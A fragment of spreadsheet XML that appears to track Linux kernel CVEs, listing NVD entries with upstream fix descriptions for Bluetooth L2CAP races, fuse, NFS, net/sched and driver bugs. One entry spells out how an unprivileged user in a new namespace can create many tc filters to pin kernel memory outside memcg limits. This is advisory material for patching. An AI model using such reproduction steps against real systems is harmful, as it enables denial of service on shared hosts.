        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="P459" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="Q459" s="5" t="inlineStr"/>
      <c r="R459" s="5" t="inlineStr"/>
      <c r="S459" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
Bluetooth: L2CAP: fix race l2cap_sock_cleanup_listen() vs. put_chan
For L2CAP sockets without owning sk-&gt;sk_socket, reading
l2cap_pi(sk)-&gt;chan may race against concurrent l2cap_sock_kill() -&gt;
l2cap_sock_put_chan().  This excludes simultaneous proto_ops callbacks,
but access in l2cap_sock_cleanup_listen() has unsafe lockless read.
 [Task 1]                         [Task 2 (hdev-&gt;workqueue)]
 l2cap_sock_release(parent)       l2cap_disconn_cfm
   l2cap_sock_cleanup_listen        l2cap_conn_del
     bt_accept_dequeue                l2cap_chan_del
       lock_sock(sk)                    l2cap_sock_teardown_cb
       bt_accept_unlink
         bt_sk(sk)-&gt;parent = NULL
       release_sock(sk) ----------------&gt; lock_sock(sk)
                                          parent = /* NULL */
     lock_sock(sk) &lt;--------------------- release_sock(sk)
                                          sock_set_flag(sk, SOCK_ZAPPED)
                                      l2cap_sock_close_cb
                                        l2cap_sock_kill(sk)
                                          l2cap_sock_put_chan
     chan = READ l2cap_pi(sk)-&gt;chan         l2cap_pi(sk)-&gt;chan = NULL
     l2cap_chan_hold_unless_zero            l2cap_put_chan(chan)
       kref_get_unless_zero(&amp;chan-&gt;ref)
Task 1 may observe NULL which causes null-ptr-deref.
Fix the race by taking lock_sock() in l2cap_sock_kill() to
synchronize with l2cap_sock_cleanup_listen().  hold_unless_zero() is not
needed here, l2cap_pi(sk)-&gt;chan owns reference if it is non-NULL.
Clarify code comments vs. locking.</t>
        </is>
      </c>
      <c r="T459" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-90091</t>
        </is>
      </c>
    </row>
    <row r="460">
      <c r="A460" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B460" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C460" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-90092</t>
        </is>
      </c>
      <c r="D460" s="5" t="inlineStr"/>
      <c r="E460" s="5" t="inlineStr"/>
      <c r="F460" s="5" t="inlineStr"/>
      <c r="G460" s="5" t="inlineStr"/>
      <c r="H460" s="5" t="inlineStr"/>
      <c r="I460" s="5" t="inlineStr"/>
      <c r="J460" s="5" t="inlineStr"/>
      <c r="K460" s="5" t="inlineStr"/>
      <c r="L460" s="5" t="inlineStr"/>
      <c r="M460" s="5" t="inlineStr"/>
      <c r="N460" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O460" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="P460" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="Q460" s="5" t="inlineStr"/>
      <c r="R460" s="5" t="inlineStr"/>
      <c r="S460" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
Bluetooth: L2CAP: reject accept queue add unless BT_LISTEN
New sk should not be added to parent socket accept queue after last
l2cap_sock_cleanup_listen() has run in l2cap_sock_teardown_cb() and
state set to BT_CLOSED, as that can result to UAF on dereferencing the
dangling parent reference.
l2cap_sock_new_connection_cb() may race with parent l2cap_chan teardown,
due to chan-&gt;state accessed without consistent locking:
  [Task 1]                           [Task 2]
  l2cap_sock_release(parent)         l2cap_connect
    l2cap_sock_shutdown                pchan = l2cap_global_chan_by_psm
      l2cap_chan_lock(pchan)
      l2cap_chan_close
        l2cap_sock_teardown_cb
          pchan-&gt;state = BT_CLOSED
      l2cap_chan_unlock(pchan) ------&gt; l2cap_chan_lock(pchan)
                                       l2cap_new_connection
                                         l2cap_sock_new_connection_cb
      l2cap_chan_lock(pchan) &lt;-------- l2cap_chan_unlock(pchan)
      l2cap_sock_kill(parent)          /* bt_sk(sk)-&gt;parent dangling */
Fix by adding check for sk_state == BT_LISTEN after acquiring sk lock in
l2cap_sock_new_connection_cb().  Add lock_sock() around sk_state writes
where missing, to avoid data races.
Although the data races on pchan-&gt;state should be fixed too, this
defensive sk_state check probably makes sense in any case.</t>
        </is>
      </c>
      <c r="T460" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-90092</t>
        </is>
      </c>
    </row>
    <row r="461">
      <c r="A461" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B461" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C461" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-90093</t>
        </is>
      </c>
      <c r="D461" s="5" t="inlineStr"/>
      <c r="E461" s="5" t="inlineStr"/>
      <c r="F461" s="5" t="inlineStr"/>
      <c r="G461" s="5" t="inlineStr"/>
      <c r="H461" s="5" t="inlineStr"/>
      <c r="I461" s="5" t="inlineStr"/>
      <c r="J461" s="5" t="inlineStr"/>
      <c r="K461" s="5" t="inlineStr"/>
      <c r="L461" s="5" t="inlineStr"/>
      <c r="M461" s="5" t="inlineStr"/>
      <c r="N461" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O461" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="P461" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="Q461" s="5" t="inlineStr"/>
      <c r="R461" s="5" t="inlineStr"/>
      <c r="S461" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
Bluetooth: L2CAP: access chan-&gt;conn safely in get/setsockopt
Since commit b66774b48dd9 ("Bluetooth: L2CAP: Fix UAF in channel timeout by holding conn ref")
l2cap_chan::conn has held reference and remains non-NULL also after the
corresponding hci_conn is deleted.  In this state accessing various
fields eg. hci_conn::hdev is invalid, which leads to KASAN crash in
l2cap_sock_setsockopt() access of conn-&gt;hcon-&gt;hdev.
Check l2cap_chan::conn.hcon corresponds to an alive hci_conn before
trying to use it in l2cap_sock.c.  Hold l2cap_chan_lock() in
getsockopt/setsockopt to ensure it stays alive, and to avoid data races
in l2cap_chan fields.</t>
        </is>
      </c>
      <c r="T461" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-90093</t>
        </is>
      </c>
    </row>
    <row r="462">
      <c r="A462" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B462" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C462" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-90094</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2026-09-17</t>
        </is>
      </c>
      <c r="P462" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="Q462" s="5" t="inlineStr"/>
      <c r="R462" s="5" t="inlineStr"/>
      <c r="S462" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
arm64: process: Fix context switching MTE store-only tag check
SCTLR_EL1.TCSO0 is set when user opt-in for MTE store-only tag check
mode. However, it is not part of SCTLR_USER_MASK which imply that on
context switch we never clear SCTLR_EL1.TCSO0, so we are leaking that
setting into another task.
Fix that by including SCTLR_EL1_TCSO0_MASK into SCTLR_USER_MASK</t>
        </is>
      </c>
      <c r="T462" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-90094</t>
        </is>
      </c>
    </row>
    <row r="463">
      <c r="A463" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B463" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C463" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-90095</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2026-09-17</t>
        </is>
      </c>
      <c r="P463" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="Q463" s="5" t="inlineStr"/>
      <c r="R463" s="5" t="inlineStr"/>
      <c r="S463" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
fuse: Fix the condition to enable over-io-uring
The existing condition in fuse_uring_cmd() is there only to avoid
disabling io-uring for connections that already run with it, missing
was a condition to refuse any IORING_OP_URING_CMD if the
connection/channel didn't get enabled because of missing FUSE_INIT
reply flag FUSE_OVER_IO_URING. Without the reply flag the barrier in
fuse_uring_ready() doesn't work and IO could already be going on and
cause deadlock states (at a minimum one between fch-&gt;bg_lock and
queue-&gt;lock).
The change itself is trivial, but brings behavior change,
FUSE_OVER_IO_URING has to be set in the FUSE_INIT_REPLY by fuse servers
to accept any IORING_OP_URING_CMD. Libfuse does that and the only
non-libfuse implementation I found (fractal-fuse) also does it.
Qemu patches for fuse-io-uring are not merged yet, as far as I know.
Moved up is the smp_load_acquire(&amp;fch-&gt;initialized) check, as a
fuse-server implementation might try to setup io-uring before FUSE_INIT
is processed and might have gotten -EOPNOTSUPP instead of -EAGAIN.
Also fixed is a stale comment that explains the handling of the
FUSE_OVER_IO_URING flag in early RFC versions.
If there should be a report from any library or application we
probably need to revert this commit.</t>
        </is>
      </c>
      <c r="T463" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-90095</t>
        </is>
      </c>
    </row>
    <row r="464">
      <c r="A464" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B464" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C464" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-90096</t>
        </is>
      </c>
      <c r="D464" s="5" t="inlineStr"/>
      <c r="E464" s="5" t="inlineStr"/>
      <c r="F464" s="5" t="inlineStr"/>
      <c r="G464" s="5" t="inlineStr"/>
      <c r="H464" s="5" t="inlineStr"/>
      <c r="I464" s="5" t="inlineStr"/>
      <c r="J464" s="5" t="inlineStr"/>
      <c r="K464" s="5" t="inlineStr"/>
      <c r="L464" s="5" t="inlineStr"/>
      <c r="M464" s="5" t="inlineStr"/>
      <c r="N464" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O464" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="P464" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="Q464" s="5" t="inlineStr"/>
      <c r="R464" s="5" t="inlineStr"/>
      <c r="S464" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
fuse: invalidate the correct range after O_APPEND direct write
fuse_direct_write_iter() captures pos before generic_write_checks(),
which moves ki_pos to EOF for O_APPEND writes:
  fuse_direct_write_iter()
  {
      pos = iocb-&gt;ki_pos;           /* 0 (user-supplied)       */
      generic_write_checks();       /* ki_pos -&gt; EOF           */
      fuse_direct_io();             /* writes at EOF, correct  */
      invalidate(pos, pos + res);   /* [0, res) -- wrong       */
  }
The post-write invalidation targets a stale range instead of the
actual written range at EOF.
This can cause data inconsistency when the file size is not
page-aligned.  The tail page straddling EOF has a valid portion
before EOF that concurrent readers can fault back in during the
DIO write window:
  Tail page (file size X not page-aligned):
    page_start         X (EOF)   page_end
    |--- valid data ----|-- stale --|
  CPU0 (O_APPEND DIO writer)    CPU1 (buffered reader)
  --------------------------    ----------------------
  invalidate [X, X+len)
    tail page evicted
  FUSE_WRITE in flight ...
                                read [page_start, X)
                                  tail page re-faulted
                                  [X, page_end) = stale
  FUSE_WRITE completes
  i_size = X + len
  invalidate [0, len)  &lt;- WRONG
    tail page still cached
                                read [X, X+len)
                                  hits stale tail page
                                  returns old data
Fix by reading pos back from iocb-&gt;ki_pos after generic_write_checks(),
as generic_file_direct_write() does.
Also fix a typo in the comment ("may have" -&gt; "may have competed").</t>
        </is>
      </c>
      <c r="T464" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-90096</t>
        </is>
      </c>
    </row>
    <row r="465">
      <c r="A465" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B465" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C465" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-90097</t>
        </is>
      </c>
      <c r="D465" s="5" t="inlineStr"/>
      <c r="E465" s="5" t="inlineStr"/>
      <c r="F465" s="5" t="inlineStr"/>
      <c r="G465" s="5" t="inlineStr"/>
      <c r="H465" s="5" t="inlineStr"/>
      <c r="I465" s="5" t="inlineStr"/>
      <c r="J465" s="5" t="inlineStr"/>
      <c r="K465" s="5" t="inlineStr"/>
      <c r="L465" s="5" t="inlineStr"/>
      <c r="M465" s="5" t="inlineStr"/>
      <c r="N465" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O465" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="P465" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="Q465" s="5" t="inlineStr"/>
      <c r="R465" s="5" t="inlineStr"/>
      <c r="S465" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
Drivers: hv: vmbus: Skip VMBus module cleanup for non-nested root partition
The VMBus module initialization function, hv_acpi_init(), currently
does nothing when running in the root partition and root is not nested
in another VM. But the initialization function reports success, so the
VMBus module is indeed loaded. VMBus functionality is not actually
needed, but the VMBus module must be loaded so that hv_vmbus_exists()
can answer correctly. Furthermore, the mshv_root dependency on the
VMBus module is needed as described in the commit message for
840b740a35bf ("mshv: Add conditional VMBus dependency").
Loading the VMBus module without actually initializing it causes
failures if the module should later be unloaded. The module unload code
tries to clean up things that were never initialized, resulting in
memory faults and a panic.
Fix this by having VMBus module exit function perform the same
check for non-nested root partition, and do nothing in such a
case, just like hv_acpi_init().
In the long run, the code that manages the Hyper-V provided SynIC
should be refactored to better coordinate the requirements of
root partition scenarios and normal VM scenarios, and to hopefully
remove the hv_vmbus_exists() dependnecy between mshv_root and
VMBus modules. Preventing the current unload failure scenario is
an expediency until such a refactoring is done.</t>
        </is>
      </c>
      <c r="T465" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-90097</t>
        </is>
      </c>
    </row>
    <row r="466">
      <c r="A466" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B466" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C466" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-90098</t>
        </is>
      </c>
      <c r="D466" s="5" t="inlineStr"/>
      <c r="E466" s="5" t="inlineStr"/>
      <c r="F466" s="5" t="inlineStr"/>
      <c r="G466" s="5" t="inlineStr"/>
      <c r="H466" s="5" t="inlineStr"/>
      <c r="I466" s="5" t="inlineStr"/>
      <c r="J466" s="5" t="inlineStr"/>
      <c r="K466" s="5" t="inlineStr"/>
      <c r="L466" s="5" t="inlineStr"/>
      <c r="M466" s="5" t="inlineStr"/>
      <c r="N466" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O466" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="P466" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="Q466" s="5" t="inlineStr"/>
      <c r="R466" s="5" t="inlineStr"/>
      <c r="S466" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
net: sparx5: fix sleep in atomic context in MAC table access
sparx5_set_rx_mode() runs with netif_addr_lock_bh held and iterates
dev-&gt;mc via __dev_mc_sync(), which per address calls sparx5_mc_sync() /
sparx5_mc_unsync() -&gt; sparx5_mact_learn() / sparx5_mact_forget().  These
take sparx5-&gt;lock, a mutex, and then poll the MAC access command
register with readx_poll_timeout(). A mutex may block, which is not
allowed from atomic context.
Convert the driver to the new .ndo_set_rx_mode_async callback introduced
in commit 3554b4345d85 ("net: introduce ndo_set_rx_mode_async and
netdev_rx_mode_work"). The async callback is invoked from process
context, so the mutex and sleeping completion poll can remain.
Observed with CONFIG_PROVE_LOCKING, CONFIG_DEBUG_SPINLOCK,
CONFIG_DEBUG_MUTEXES and CONFIG_DEBUG_ATOMIC_SLEEP enabled:
  BUG: sleeping function called from invalid context at kernel/locking/mutex.c:591
  in_atomic(): 1, irqs_disabled(): 0, non_block: 0, pid: 217, name: ip
  preempt_count: 201, expected: 0
  Call trace:
   __might_resched+0x144/0x248
   __might_sleep+0x48/0x7c
   __mutex_lock+0x74/0x850
   mutex_lock_nested+0x24/0x30
   sparx5_mact_learn+0x78/0x100
   sparx5_mc_sync+0x40/0x54
   __hw_addr_sync_dev+0xc4/0x170
   sparx5_set_rx_mode+0x4c/0x58
   __dev_set_rx_mode+0x64/0xa4
   __dev_open+0x1ec/0x26c</t>
        </is>
      </c>
      <c r="T466" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-90098</t>
        </is>
      </c>
    </row>
    <row r="467">
      <c r="A467" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B467" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C467" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-90099</t>
        </is>
      </c>
      <c r="D467" s="5" t="inlineStr"/>
      <c r="E467" s="5" t="inlineStr"/>
      <c r="F467" s="5" t="inlineStr"/>
      <c r="G467" s="5" t="inlineStr"/>
      <c r="H467" s="5" t="inlineStr"/>
      <c r="I467" s="5" t="inlineStr"/>
      <c r="J467" s="5" t="inlineStr"/>
      <c r="K467" s="5" t="inlineStr"/>
      <c r="L467" s="5" t="inlineStr"/>
      <c r="M467" s="5" t="inlineStr"/>
      <c r="N467" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O467" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="P467" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="Q467" s="5" t="inlineStr"/>
      <c r="R467" s="5" t="inlineStr"/>
      <c r="S467" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
net/sched: account classifier filter allocations to memcg
Allocations in the tc classifier *_change() paths (filter objects,
per-CPU counters, and per-filter aux data) use plain GFP_KERNEL without
__GFP_ACCOUNT, allowing unprivileged users to pin kernel memory outside
memcg charging. The shared tcf_exts_init_ex() action array allocation in
cls_api.c was also uncharged; this patch closes it along with the
per-classifier filter-object/percpu/aux allocations that remain
unaccounted.
Add GFP_KERNEL_ACCOUNT to:
- the shared tcf_exts_init_ex() action array (cls_api.c), common to every
  filter of every classifier (32 pointers, 256 bytes);
- the filter-object, per-CPU-counter, and per-filter aux allocations in
  cls_basic, cls_bpf, cls_cgroup, cls_flow, cls_flower, cls_fw,
  cls_matchall, cls_route and cls_u32;
- the u32_init_knode() replace-path knode allocation (cls_u32.c), which
  allocates the same struct tc_u_knode + sel.keys on every replace of an
  existing knode and was missed by the create-path-only conversion.
Also fix the cls_basic error path: basic_change() inserts fnew into the
IDR before allocating the per-CPU counter. If alloc_percpu() fails the
errout path kfree'd fnew without idr_remove, leaving a dangling pointer
in the IDR. With GFP_KERNEL_ACCOUNT the percpu alloc becomes failable
on demand (memcg at memory.max), making the dead path attacker-reachable
and burning the handle permanently. Add the idr_remove on the percpu
failure path, matching the basic_set_parms failure-path pattern.
Note: vega@nebusec.ai provided a poc for basic_cls, but it was easy to
extend to the other classifiers.
Conditions to recreate the bug:
- CONFIG_NET_SCHED, CONFIG_NET_CLS_* (the classifier being used),
  CONFIG_NET_CLS_ACT, CONFIG_MEMCG, CONFIG_USER_NS, CONFIG_NET_NS.
- Unprivileged user in a fresh user+network namespace (unshare -Urn),
  or root with CAP_NET_ADMIN.
- Create a large number of tc filters (e.g. tc filter add dev lo
  ingress ... &lt;classifier&gt; ...) while watching a memcg-limited cgroup:
  system slab grows far faster than memory.current, pinning kernel
  memory outside memcg charging.</t>
        </is>
      </c>
      <c r="T467" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-90099</t>
        </is>
      </c>
    </row>
    <row r="468">
      <c r="A468" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B468" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C468" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-90100</t>
        </is>
      </c>
      <c r="D468" s="5" t="inlineStr"/>
      <c r="E468" s="5" t="inlineStr"/>
      <c r="F468" s="5" t="inlineStr"/>
      <c r="G468" s="5" t="inlineStr"/>
      <c r="H468" s="5" t="inlineStr"/>
      <c r="I468" s="5" t="inlineStr"/>
      <c r="J468" s="5" t="inlineStr"/>
      <c r="K468" s="5" t="inlineStr"/>
      <c r="L468" s="5" t="inlineStr"/>
      <c r="M468" s="5" t="inlineStr"/>
      <c r="N468" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O468" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="P468" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="Q468" s="5" t="inlineStr"/>
      <c r="R468" s="5" t="inlineStr"/>
      <c r="S468" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
ptp: netc: fix period truncation and potential divide-by-zero in PEROUT
The max_period bound in net_timer_enable_perout() was computed as:
  max_period = (u64)NETC_TMR_DEFAULT_FIPER + integral_period;
which exceeds U32_MAX when integral_period &gt; 0 (e.g. 0x100000002 for
the default 333333333 Hz clock). A period_ns that passes this check but
exceeds U32_MAX is then silently truncated when stored into the u32
struct netc_pp::period field.
A truncated value of zero can reach netc_timer_set_perout_alarm(), where
the local u32 period variable would also be 0, causing a divide-by-zero
in roundup_u64(delta, period) whenever the stime &lt; min_time branch is
taken (which always happens for a start time of {0, 0}).
Additionally, netc_timer_enable_periodic_pulse() and
netc_timer_enable_fiper() both compute:
  fiper = pp-&gt;period - integral_period;
A zero pp-&gt;period results in an unsigned wraparound to 0xFFFFFFFD,
mis-programming the FIPER hardware register.
Fix all three issues by capping max_period at NETC_TMR_DEFAULT_FIPER
(0xFFFFFFFF). This ensures that any period_ns passing the range check
fits in a u32 without truncation, so the stored value is always valid
and non-zero. The accepted range is reduced by integral_period ns
(typically only a few nanoseconds), which is negligible in practice.</t>
        </is>
      </c>
      <c r="T468" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-90100</t>
        </is>
      </c>
    </row>
    <row r="469">
      <c r="A469" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B469" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C469" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-90101</t>
        </is>
      </c>
      <c r="D469" s="5" t="inlineStr"/>
      <c r="E469" s="5" t="inlineStr"/>
      <c r="F469" s="5" t="inlineStr"/>
      <c r="G469" s="5" t="inlineStr"/>
      <c r="H469" s="5" t="inlineStr"/>
      <c r="I469" s="5" t="inlineStr"/>
      <c r="J469" s="5" t="inlineStr"/>
      <c r="K469" s="5" t="inlineStr"/>
      <c r="L469" s="5" t="inlineStr"/>
      <c r="M469" s="5" t="inlineStr"/>
      <c r="N469" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O469" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="P469" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="Q469" s="5" t="inlineStr"/>
      <c r="R469" s="5" t="inlineStr"/>
      <c r="S469" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
bnxt_en: Fix call to hardware monitoring event handler
The first parameter of hwmon_notify_event() is supposed to be the hardware
monitoring device. The bnxt driver calls it with the platform device as
first parameter instead. This API break results in undefined behavior and
may result in a crash.
Pass the hardware monitoring device as parameter instead to fix the
problem.</t>
        </is>
      </c>
      <c r="T469" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-90101</t>
        </is>
      </c>
    </row>
    <row r="470">
      <c r="A470" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B470" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C470" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-90102</t>
        </is>
      </c>
      <c r="D470" s="5" t="inlineStr"/>
      <c r="E470" s="5" t="inlineStr"/>
      <c r="F470" s="5" t="inlineStr"/>
      <c r="G470" s="5" t="inlineStr"/>
      <c r="H470" s="5" t="inlineStr"/>
      <c r="I470" s="5" t="inlineStr"/>
      <c r="J470" s="5" t="inlineStr"/>
      <c r="K470" s="5" t="inlineStr"/>
      <c r="L470" s="5" t="inlineStr"/>
      <c r="M470" s="5" t="inlineStr"/>
      <c r="N470" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O470" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="P470" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="Q470" s="5" t="inlineStr"/>
      <c r="R470" s="5" t="inlineStr"/>
      <c r="S470" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
NFSv4/pnfs: key the data server cache on the NFS version
nfs4_pnfs_ds_add() keys the per-net data server cache on the multipath
address set alone, and struct nfs4_pnfs_ds records no version. That
suffices for the files layout driver, which always connects with version
4, but flexfiles takes its version tuple from GETDEVICEINFO per device,
and one address can legitimately serve both NFSv3 and NFSv4.
Two deviceids on one address with different ds_versions[0].version
therefore share a single nfs4_pnfs_ds, and whichever mirror connects
first pins ds_clp to its own version. The other one is handed that
client anyway, so it selects rpc_call_ops for a version the connection
does not speak, and the mismatched sequence-slot handling dereferences
NULL.
Add the version to the cache key so the two cannot alias, giving each
version its own nfs4_pnfs_ds and connection while both mirrors stay
usable. Only the major version is compared, since that is what selects
rpc_call_ops and rpc_ops; v4.0 and v4.1 keep sharing a client. The files
layout driver passes the 4 it already hardcodes at connect time.</t>
        </is>
      </c>
      <c r="T470" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-90102</t>
        </is>
      </c>
    </row>
    <row r="471">
      <c r="A471" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B471" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C471" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-90103</t>
        </is>
      </c>
      <c r="D471" s="5" t="inlineStr"/>
      <c r="E471" s="5" t="inlineStr"/>
      <c r="F471" s="5" t="inlineStr"/>
      <c r="G471" s="5" t="inlineStr"/>
      <c r="H471" s="5" t="inlineStr"/>
      <c r="I471" s="5" t="inlineStr"/>
      <c r="J471" s="5" t="inlineStr"/>
      <c r="K471" s="5" t="inlineStr"/>
      <c r="L471" s="5" t="inlineStr"/>
      <c r="M471" s="5" t="inlineStr"/>
      <c r="N471" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O471" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="P471" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="Q471" s="5" t="inlineStr"/>
      <c r="R471" s="5" t="inlineStr"/>
      <c r="S471" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
NFSv4.2: fix LAYOUTSTATS send buffer exhaustion
encode_layoutstats_maxsz budgets XDR_QUADLEN(PNFS_LAYOUTSTATS_MAXSIZE),
i.e. 256 bytes, for the layoutupdate4 body written by the layout driver.
The flexfiles record can exceed that.
ff_layout_encode_ff_layoutupdate() emits, per data server, a netaddr4,
an nfs_fh4, two ff_io_latency4, an nfstime4 and a bool.  A data server
whose filehandle is NFS_MAXFHSIZE bytes long already accounts for 132 of
those bytes, and the two ff_io_latency4 at 64 bytes each, the nfstime4
and the bool add a further 144, so the body passes 256 bytes before the
netaddr4 is encoded at all.  encode_layoutstats() additionally writes
the deviceid4 and the layoutupdate4 lou_type word, neither of which the
macro accounts for.
The filehandle and the address are both chosen by the server, through
LAYOUTGET and GETDEVICEINFO, so it can drive the encoder past the
end of the send buffer.  xdr_reserve_space() returns NULL once that
happens, and the two ff_layout_encode_io_latency() calls run with
dss_info-&gt;mirror-&gt;lock held, so a NULL return there leaves the lock
permanently held.
Raise PNFS_LAYOUTSTATS_MAXSIZE to 384 so that the record fits inside the
reservation.</t>
        </is>
      </c>
      <c r="T471" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-90103</t>
        </is>
      </c>
    </row>
    <row r="472">
